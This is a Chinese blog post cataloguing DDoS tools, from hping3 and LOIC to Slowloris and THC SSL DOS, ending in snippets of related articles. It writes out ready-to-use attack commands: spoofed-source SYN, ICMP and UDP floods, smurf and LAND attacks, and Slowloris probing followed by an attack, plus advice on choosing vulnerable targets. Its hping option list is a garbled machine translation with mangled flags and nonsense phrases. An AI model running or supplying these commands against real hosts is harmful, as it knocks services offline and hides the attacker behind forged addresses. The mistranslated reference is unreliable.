DDoS攻击工具

DDoS攻击工具

综合性工具

综合性工具除了可以进行DDoS攻击外,还可用于其他的用途,例如:端口扫描、安全审计、防火墙等。实际上,大部分综合性工具开发的原始目的并不是用于DDoS,而是“网络检查或测试工具”

Hping

? Hping是一个编码和解码TCP/IP协议的命令行开发工具,常用于测试网络及主机的安全,同时也可以做安全审计、防火墙测试等工具的标配工具;Hping的命令行就像常用的ping命令,不同的是,它不仅能发送ICMP请求,而且支持TCP、UDP、RAW-IP等协议;Hping的特色在于能够定制数据包的各个部分。

? Hping常常别用做网络攻击工具,使用Hping可以方便的额构造DoS攻击,如:ICMP洪水攻击、UDP洪水攻击、SYN洪水攻击等。

? Hping的常用功能包括网络压力测试、防火墙测试、端口扫描等。

使用手册:https://www.hi-linux.com/posts/57862.html

-H——帮助显示此帮助

-V—版本显示版本

-C——发送数据包的数据项目

-i——间隔发送数据包的间隔时间(u即微秒)(u x表示x微秒,例如-i u1000)

---i u10000的快速别名(每秒10个数据包)

---i u1000的更快别名(每秒100个数据包)

--Flood快速发送数据包,不显示返回

-n——数字化输出

-Q——安静安静模式

-i——接口接口名称(否则为默认路由接口)

-v——详细详细模式

-d——调试调试信息

-z—将bind ctrl+z绑定到ttl(默认为dst端口)

-Z—取消绑定取消绑定ctrl+z

--每收到一个匹配的数据包都会发出哔哔声

模式

默认模式TCP

-0—RAWIP原始IP模式

-1—ICMP ICMP模式

-2——UDP UDP模式

-8——扫描扫描模式。

示例:hping--scan 1-30,70-90-s www.target.host

-9——听-听模式

知识产权

-a—欺骗源地址

--随机目的地地址模式。见那个人。

--随机源地址模式。见那个人。

-T—TTL TTL(默认为64)

-n—ID ID(默认随机)

-w——win id使用win*id字节排序

-r——rel relativize id字段(用于估计主机流量)

-f——用更多的碎片分割数据包。(可能通过弱ACL)

-x—morefrag设置更多片段标志

-Y—Dontfrag集不分段标志

-g—fragoff设置碎片偏移量

-m——mtu设置虚拟mtu,意味着——如果包大小大于mtu,则为frag

-o--tos服务类型(默认为0x00),尝试--tos帮助

-g——route包括记录路由选项并显示路由缓冲区

--LSRR松散源路由和记录路由

--SSRR严格的源路由和记录路由

-h--ipproto设置IP协议字段,仅在原始IP模式下

ICMP

-C—icmp type icp类型(默认回显请求)

-k—ICMPCode ICMP代码(默认为0)

--强制ICMP发送所有ICMP类型(默认仅发送支持的类型)

--icmp gw为icmp重定向设置网关地址(默认为0.0.0.0)

--icmp ts别名--icmp--icmptype 13(icmp时间戳)

--ICMP地址别名--ICMP--ICMPType 17(ICMP地址子网掩码)

--ICMP帮助显示其他ICMP选项的帮助

UDP/TCP协议

-S—基址端口基址源端口(默认随机)

-p--destport[+]+]destination port(默认值0)ctrl+z inc/dec

-k——保持源端口静止

-w—win winsize(默认值64)

-o——tcpoff设置假tcp数据偏移量(而不是tcphdrlen/4)

-q—seqnum仅显示TCP序列号

-B—badcksum(尝试)发送具有错误IP校验和的数据包

许多系统将修复发送数据包的IP校验和

因此,您将得到错误的UDP/TCP校验和。

-m——setseq设置TCP序列号

-L—set ack设置tcp ack

-F—fin设置fin标志

-S—SYN设置SYN标志

-R——RST设置RST标志

-P——推集推标志

-A—ACK设置ACK标志

-U—URG设置URG标志

-x—xmas set x unused标志(0x40)

-Y—Ymas设置Y未使用标志(0x80)

--tcp exit code使用最后一个tcp->th_标志作为退出代码

--tcp mss使用给定值启用tcp mss选项

--tcp timestamp启用tcp timestamp选项来猜测hz/uptime

共同的

-d——数据数据大小(默认值为0)

-e——文件中的文件数据

-E——签名加上“签名”

-j——以十六进制转储数据包

-j——打印转储可打印字符

-B——安全启用“安全”协议

-u——结束,告诉你什么时候——文件到达eof,并防止倒带。

-t——traceroute traceroute模式(意味着——bind和——ttl 1)

--在traceroute模式下接收第一个非ICMP时,tr停止退出

--tr keep ttl保持源ttl固定,仅用于监视一个跃点

--tr no rtt不在traceroute模式下计算/显示rtt信息

ARS包描述(新的、不稳定的)

--APD发送发送APD描述的数据包(见docs/apd.txt)

Hping操作

上两张图是Hping3命令界面和目标192.168.2.191主机的拦包结果:

Hping命令使用的是 -i:是间隔100000微秒(其中u是微秒单位)发送数据包的间隔时间

-0—RAWIP原始IP模式

-1—ICMP ICMP模式

-2—UDP UDP模式

-8—扫描扫描模式

-a:伪造源IP地址为xxx.xxx.xxx.xxx

SYN Flooding(SYN洪水攻击)

hping3    目标主机IP  -i  u微秒时间   -S  -a  伪造的源IP

伪造IP的ICMP封包

hping3 目標主機IP -i u100000 -1 -a 偽造來源IP
  • SYN+FIN
hping3 目標主機IP -i u100000 -S -F -a 偽造來源IP

  • FIN+SYN+RSP+PSH+ACK+UDP
hping3 目标主机IP -i u100000 -F -S -R -A -U -a 伪造来源IP

  • 伪造IP的UDP封包
hping3 目标主机IP -i u100000 -2 -a 伪造来源IP

上述的命令中,伪造了源IP向目标主机发送了UDP数据包

  • 伪造IP内含数据代码
hping3 目标主机IP -i u100000 -d[封包数据] -E[文件名] -a[伪造源IP]
  • SMURF攻击

结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正常系统进行服务。

hping3 -1 -a 192.168.1.5 192.168.1.255
  • XMAS TREE攻击
hping3 -SFRP 目标IP
  • LAND攻击
hping3 -k -S -s 25 -p 25 -a 伪造源IP地址
  • 用tcpdump的记录流量

PenTBox

兼容windows、mac os、Android;基于Ruby开发。

  • 三个主体功能

    • 密码算法工具
    • 网络工具(压力测试、溢出攻击)
    • Web安全测试工具

Zarp

Zarp是一款采用python编写的而网络攻击测试集成工具Zarp仅限运行在Linux平台,Zarp的主要接口是一个CLI驱动的图形界面。

  • 启动Zarp.py

压力测试工具

LOIC

LOIC,低轨道离子炮;开源的网络压力测试工具。

  • Windows平台LOIC启动界面

LOIC的不足之处在于他不可以伪造源IP地址。

LOIC可以对目标发动TCP、UDP以及HTTP GET等洪水攻击

HOIC

HOIC,高轨道离子炮;是一款基于HTTP协议的开源DDoS工具,HOIC主要用于内部网络和外部服务器安全性和稳定性能测试;

HOIC可以发送多线程的HTTP FLOOD洪水攻击;同样额HOIC也同样无法隐藏源IP地址。

HULK

? HULK是一款基于Python的Web压力测试工具。HULK默认启动500线程对目标发起高频率的HTTP GET洪水攻击请求,独特之处在于,每一次的请求都是独一的,由此可以绕开服务器端采用缓存的防范措施。同时HULK也支持User-Agent和referer的伪造。

专业的攻击工具

Slowloris

Slowloris是一个Perl程序。(也有Python的版本)

? Slowloris的使用较为简单,一般分为两个步骤:

  • 首先是对目标进行探测:
perl slowloris.pl -dns 目标IP -port 目标端口号 -test

? 对目标进行探测的主要目的是获取目标服务器的连接时间,当目标服务器的时间超时小于166秒,工具运行会出现异常,所以建议选择超时时间大于200秒以上的目标。

测试中,首要是确定目标的对象IP,然后进行多次的超时时长的探测。

  • 实施攻击
perl slowloris.pl -dns 目标IP -port 目标端口号 - timeout TTL

TTL指的是根据之前的探测,设置一个合适的超时时间;因为Slowloris攻击方法主要就是依靠超时占用对方资源而实现DoS攻击的目的,所以还是需要这只一个合适的超时时间的。

? 在之前提过,该攻击方法是有不足的,只能针对部分的web服务端有效;目前收到影响的有:Apache1.x/2.x、dhttpd、GoAhead、WebServer、Squid等;而IIS则不受影响。

R.U.D.Y

? RUDY采用一种慢速的HTTP POST请求的方式给目标发动攻击。与之前的Slowloris利用请求Header部分不同,RUDY利用的是请求的body部分;因为服务器端会根据Content-Length字段的内容值持续等待,直到客户端数据发送完毕。

太繁琐,不用了。

THC SSL DOS

? THC SSL DOS 利用SSL中已知弱点而使其DoS;这种攻击是非对称的,一次客户请求就可以让服务端进行相当于客户端的15倍的CPU资源进行处理。

thc-ssl-dos --accept xxx.xxx.xxx.xxx [prot]xx

如果目标禁用或启动了安全的 rengotiation ,则会提示攻击失败。

利用THC SSL DOS工具,一台性能和带宽中等的主机就可以挑战高性能的服务器;攻击效果非常明显。

原文地址:https://www.cnblogs.com/wangyuyang1016/p/11000172.html

时间: 2024-10-02 04:30:23

DDoS攻击工具的相关文章

假冒谷歌爬虫成为第三大 DDoS 攻击工具

在安全牛之前发布的文章<Prolexic发布2014年第一季度全球DDoS攻击报告>中,我们了解到采用"反射放大"技术发起的攻击流量比上一季度增加了39%,同时攻击者也在不断发掘利用其他一些互联网基础服务来发动DDoS攻击,例如今年3月安全公司Sucuri发现黑客利用超过16.2万WordPress网站的Pingback功能进行大规模DDoS放大攻击. 近日,新的研究表明,假冒谷歌爬虫已经成为第三大DDoS攻击工具,详情如下: Incapsula研究人员在调查了搜索引擎在1

2014年DDoS攻击事件深入分析

在<2014年DDoS攻击事件分析>的文章中,绿盟科技威胁响应中心第一时间对运营商DDoS攻击事件进行了简要分析.后续绿盟科技DDoS专家跟踪对此次运营商大规模DDoS攻击事件进行了深入分析,发现事件的原因是黑客为了攻击国外游戏厂商,调用了大量国内的肉鸡发起了大规模DDoS递归查询,在短暂的时间内发起了峰值大于6Gbps的查询请求(全国范围内大于100G的攻击).不过让人出乎意料的是,这些肉鸡的大部分居然是家用路由器(相信很多人都24小时不关路由的),这也暴露此类设备的安全性较差,进而引发了业

DDoS攻击态势

DDoS态势报告刊登于绿盟科技安全+技术刊物.多年来,绿盟科技致力于帮助客户实现业务的安全顺畅运行.每天,绿盟科技的防护产品和监测系统会发现数以千计的DDoS(分布式拒绝服务)攻击危害客户安全.为了快速反馈这类攻击的信息,绿盟科技发布<2014H1DDoS 威胁报告>.本报告为2014 年半年报,用于快速跟踪及反馈DDoS 威胁的发展态势. 关键发现 本次报告包括以下关键观点: 政府网站依然是最主要的攻击对象,攻击者选择目标具有"潮流性" 广州.上海和浙江是最集中的受害区域

DDoS攻击防御方案

DDoS攻击防御方案 近期DDoS攻击事件较多(2014年DDoS攻击事件分析),大家都在思考一个问题,在面临DDoS攻击的时候,如何防御ddos攻击?绿盟科技安全+技术刊物特别邀请到绿盟科技在运营商方面的DDoS专家,给大家讲讲DDoS攻击防御方案. DDoS攻击威胁现状 对于DDoS攻击,有多种分类方式,例如流量型DDoS攻击(如SYN Flood.UDP Flood.ICMP Flood.ACK Flood等).应用层的DDoS攻击(如Http Get Flood.连接耗尽.CC等).慢速

DDoS攻击、CC攻击的攻击方式和防御方法

DDoS介绍 DDoS是英文Distributed Denial of Service的缩写,意即"分布式拒绝服务",那么什么又是拒绝服务(Denial of Service)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击.也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的.分布式拒绝服务攻击一旦被实施,攻击网络包就会从很多DOS攻击源(俗称肉鸡)犹如洪水般涌向受害主机,从而把合法用户的网络包淹没

揭秘DDoS攻击

大家在谈论DDoS攻击的时候,常常可以看到这样的开头"分布式拒绝服务攻击(DDoS)是拒绝服务攻击(DoS)中的一种,用分布式的客户端,向服务者发起大量看似合法的请求,消耗或长期占用大量资源,从而达到拒绝向受众提供服务的目的."从这样的介绍中,很难感受到DDoS攻击的威力,那么换一种说法呢"50 块钱就能击瘫一家网站",这样大家就有感觉了,这种感觉对DDoS攻击的受害者而言,更是有着切肤之痛! DDoS攻击 要深入了解DDoS攻击,我们先来看一张图,大概了解DDoS

程序员快递请查收,来自Python黑客大佬的一份DDOS攻击说明书!

DDoS攻击没有我们想象中的那么简单,并不是什么Python程序员都能够做到的. 若要知晓黑客利用DDOS攻击原理那么我们必须要知道是实行DDoS攻击比较难的原因是什么? 很简单的一句话概括:"Python程序员要掌握一定的入侵技巧." 在此我为叙述下网络上常见的攻击工具的原理: trin00 Tribe Flood Network DDOS攻击原理更深层次的了解: 对DDOS攻击工具trin00结构的认识: 黑客利用DDOS攻击原理之实施攻击的步骤: 透过寻常网路(网络)连线,使用者

CC攻击工具list

攻击工具包括超强CC攻击器软件.Libpcap开发库和WEB性能测试工具Httperf.Web Apple Pid DDOS攻击器.DDoSIM.HTTP-flood攻击工具和数据包捕获软件etherpeek.Microsoft Web Application Stress工具.HOIC和LOIC.CC作者2004年编写的攻击工具CC攻击软件.Httperf与Autobench相结合的方式.CC攻击小助手在网上搜索代理服务器和CC攻击工具致命攻击V2.0.暗影DDoS压力测试系统V2016.WA

DDoS攻防战 (二) :CC攻击工具实现与防御理论

故上兵伐谋 其次伐交 其次伐兵 其下攻城 攻城之法 为不得已 知己知彼 百战不殆 不知彼而知己 一胜一负 不知彼不知己 每战必败 --孙子兵法·谋攻 我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量可用代理ip:port列表   网上所处可见免费代理,我们使用http的GET方法抓取html文档,接着使用正则过滤出我们需要的ip port对,然后